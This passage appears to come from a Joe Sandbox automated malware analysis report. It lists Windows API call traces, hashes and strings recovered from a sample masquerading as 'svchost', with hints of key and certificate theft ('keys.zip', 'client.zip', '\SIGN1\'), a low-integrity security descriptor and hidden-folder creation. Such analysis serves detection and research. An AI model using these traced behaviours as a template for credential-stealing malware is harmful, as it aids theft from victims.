• UnlockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000,?,?,02BD5632,00004D42), ref: 02BB7669
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
• API ID: File$LockPointerUnlockWrite
• String ID:
• API String ID: 3342219707-0
APIs
• CreateThread.KERNEL32(00000000,00000000,02BC6CA0,00000000,00000000,00000000), ref: 02BC77D4
• GetHandleInformation.KERNEL32(00000000,?), ref: 02BC77EC
• CloseHandle.KERNEL32(00000000), ref: 02BC77FD
• ExitThread.KERNEL32 ref: 02BC7805
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
• API ID: HandleThread$CloseCreateExitInformation
• String ID:
• API String ID: 4233414108-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02BC0C69), ref: 02BC41BE
• HeapValidate.KERNEL32(00000000), ref: 02BC41C1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
• RtlFreeHeap.NTDLL(00000000), ref: 02BC41D1
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
• API ID: Heap$Process$FreeValidate
• String ID:
• API String ID: 1670920773-0
APIs
  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
  • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
  • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
  • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
  • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
  • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
  • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
• GetProcessHeap.KERNEL32(00000000,00000000,?,75570F10,00000000,02BCA2D3), ref: 02BC4A88
• HeapValidate.KERNEL32(00000000), ref: 02BC4A8B
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC4A98
• HeapFree.KERNEL32(00000000), ref: 02BC4A9B
Memory Dump Source
• Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
• API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
• String ID:
• API String ID: 789118668-0
                                                                                                                                                                                                                • Opcode ID: 80225c1d6a4f6c71f8c48d63022a15f1c35d2d7ca5d08e1c5023d90a16474a06
                                                                                                                                                                                                                • Instruction ID: dc1f79fdc7b93d95cfd731e107797dc6260a562fe6f539b83dde8d70533225b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80225c1d6a4f6c71f8c48d63022a15f1c35d2d7ca5d08e1c5023d90a16474a06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D014771B861401ADB244A78697077BABBEDF82790B6D02DDF865C7288E721CD009758
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02BD9223), ref: 02BD8CEF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                • Opcode ID: 06e7347244128f62f97098b31e928b3392d2c5da5d2665100dc1039c78ab1d26
                                                                                                                                                                                                                • Instruction ID: 9ae62e70f1d96539db6dbaf06b6005617eb0dd15cec509bce24578656540bee0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06e7347244128f62f97098b31e928b3392d2c5da5d2665100dc1039c78ab1d26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E11E672A017485BD7309E6DA8C47AAFBECEB4426AF6009FFEA49C3680D37198518750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocateProcessmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 983300431-0
                                                                                                                                                                                                                • Opcode ID: 3bbb2118801bd1de9399a137bd1631641f76dad1d1db4642feedda54b91ed71b
                                                                                                                                                                                                                • Instruction ID: 6e2268bf3aeaa9fddc85852f36ec177d76c289c16786da52523eb03415f040c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bbb2118801bd1de9399a137bd1631641f76dad1d1db4642feedda54b91ed71b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56E0C277B8251166DA61112A7C18B9B2A2DDFC1671F260268FB45E3280DB20C94A46B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1494777729-0
                                                                                                                                                                                                                • Opcode ID: cc8b4963c8749520315efdce6e33fcc4a12a574b70226ae0bd1eed18ad101a9c
                                                                                                                                                                                                                • Instruction ID: a7ff049d6ebf42c13f048d6cd854432958bef7bc363130dfe03e01b7a327e0cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc8b4963c8749520315efdce6e33fcc4a12a574b70226ae0bd1eed18ad101a9c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29E065B6E406089FCF10DFD8D84599DB778FB48320F008649FA14A7240C774A920CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID: v-@
                                                                                                                                                                                                                • API String ID: 3664257935-4190885519
                                                                                                                                                                                                                • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                                • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: bad pack level
                                                                                                                                                                                                                • API String ID: 2221118986-4081416248
                                                                                                                                                                                                                • Opcode ID: dd076006cd378057dfc80a345883009e6782fb86c1f22eaf4c17d53082dad67e
                                                                                                                                                                                                                • Instruction ID: fc85d1f1134f9f9fb945dcaa96aac828c6c35db70eec40dacbc31e746d46d09b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd076006cd378057dfc80a345883009e6782fb86c1f22eaf4c17d53082dad67e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 593182F6A00B148AD3209FB9D4805E7F7E6FF46314740497EE1AE96250DB78A085DF53
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,02BD757C), ref: 02BD77BF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: more < 2
                                                                                                                                                                                                                • API String ID: 3510742995-2484782096
                                                                                                                                                                                                                • Opcode ID: 7a25556c5d0b048cb7b3287275cec18ca0139c34415acfdfb5b24d286f409378
                                                                                                                                                                                                                • Instruction ID: 06a272928c6ce8f14526149c40adac8c164d62594777ed625e4a527c53e39a60
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a25556c5d0b048cb7b3287275cec18ca0139c34415acfdfb5b24d286f409378
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74314BB1650A008BD7249BB9C4407E7F3A2FF42224F144ABDD0AB92294FB797485DE43
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,00000068,?,02BD910E,00000068,00000000,00000000,00000000,00000011), ref: 02BD8EF6
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,02BD910E,00000068,00000000,00000000,00000000,00000011), ref: 02BD8F2C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileReadmemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1163090680-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,02BC8ECD,?,?,?,?,?,?), ref: 02BB79C8
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79CF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$AttributesDelete
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2910425767-0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02BCFDFB,C0000000,00000003,00000000,00000002,00000080,00000000,?,02BD561D), ref: 02BB72F4
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$ConvertCreateFileFreeInfoLocalNamedSaclString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2757955739-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 02BBD35F
                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02BBD36A
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD37D
                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 02BBD392
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD3A1
                                                                                                                                                                                                                • SetWindowTextA.USER32(?,-00000008), ref: 02BBD3AD
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD3BC
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD3C7
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD3DA
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 02BBD418
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD428
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD437
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02BBD44F
                                                                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 02BBD459
                                                                                                                                                                                                                • CreateFontIndirectA.GDI32 ref: 02BBD46F
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02BBD47F
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BBD4B7
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BBD4BA
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02BBD4CE
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 02BBD533
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02BBD55D
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 02BBD569
                                                                                                                                                                                                                • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02BBD585
                                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02BBD5AA
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02BBD5BC
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD5C5
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD5D4
                                                                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 02BBD5DB
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02BBD5EF
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02BBD613
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02BBD620
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 02BBD630
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000DE), ref: 02BBD64C
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000F2), ref: 02BBD655
                                                                                                                                                                                                                • LoadIconA.USER32(00000000,00007F00), ref: 02BBD661
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02BBD67B
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD6A4
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD6B3
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD6C6
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02BBD6E9
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 02BBD707
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000001), ref: 02BBD714
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD723
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBD73B
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                                  • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBD748
                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 02BBD7B7
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000), ref: 02BBD7BE
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD7CE
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBD7E8
                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 02BBD7FD
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD80C
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 02BBD818
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BBD827
                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 02BBD82E
                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 02BBD843
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                                • String ID: '$<$P0Wu$static
                                                                                                                                                                                                                • API String ID: 2592195760-2115307949
                                                                                                                                                                                                                • Opcode ID: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                                • Instruction ID: bbe77d3bf8c27a51baf993195a4ebad47598fbc2af0b58c3bc250a8c02e394a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E1C471984301AFD7A18F68EC88F7A37A8EF887A2F540A08F755E72C5C7B49451CB61
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD2BCE
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD2BE8
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2C12
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD2C37
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD2C77
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD2C81
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2C89
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BD2C9A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD2CA1
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 02BD2CE4
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02BD2D30
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752,00000000,00000000), ref: 02BD2D77
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                                • API String ID: 1576442920-4273285962
                                                                                                                                                                                                                • Opcode ID: 8b3a4a29c68bd7f683530068166c8a8f3716185f673b88743bbc8a41f01edccc
                                                                                                                                                                                                                • Instruction ID: dd60c5284d994a9b00b817e2fc5497e8ff43cbc09e91c6cebe123f8da4634dab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b3a4a29c68bd7f683530068166c8a8f3716185f673b88743bbc8a41f01edccc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0D146309043899FDB258F38D858BEA7BE5EF45340F1485D5EDCAD7242EB70A989CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
